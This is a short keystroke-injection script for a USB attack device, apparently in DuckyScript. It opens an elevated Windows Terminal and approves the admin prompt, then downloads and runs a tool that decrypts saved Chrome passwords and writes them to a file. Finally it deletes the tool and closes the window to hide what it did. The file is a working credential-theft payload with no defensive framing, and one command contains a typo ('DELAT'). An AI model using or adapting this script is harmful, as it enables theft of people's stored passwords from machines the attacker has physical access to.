DELAY 1000
GUI r
DELAY 200
STRING powershell -Command Start-Process wt -Verb RunAs
ENTER
DELAY 1500
LEFT
DELAY 500
ENTER
DELAY 1000
STRING cd ./Desktop/
ENTER
DELAY 500
STRING git clone https://github.com/ohyicong/decrypt-chrome-passwords.git
ENTER
DELAY 500
STRING cd ./decrypt-chrome-passwords/
ENTER
DELAY 500
STRING pip install pypiwin32
ENTER
DELAY 500
STRING pip install pycryptodomex
ENTER
DELAY 500
STRING python3 ./decrypt_chrome_password.py >> *The path where you want to extract the passwords*
ENTER
DELAY 500
STRING cd ..
ENTER
DELAY 500
STRING rm -force ./decrypt-chrome-passwords/
ENTER
DELAT 300
STRING y
ENTER
DELAY 500
ALT F4



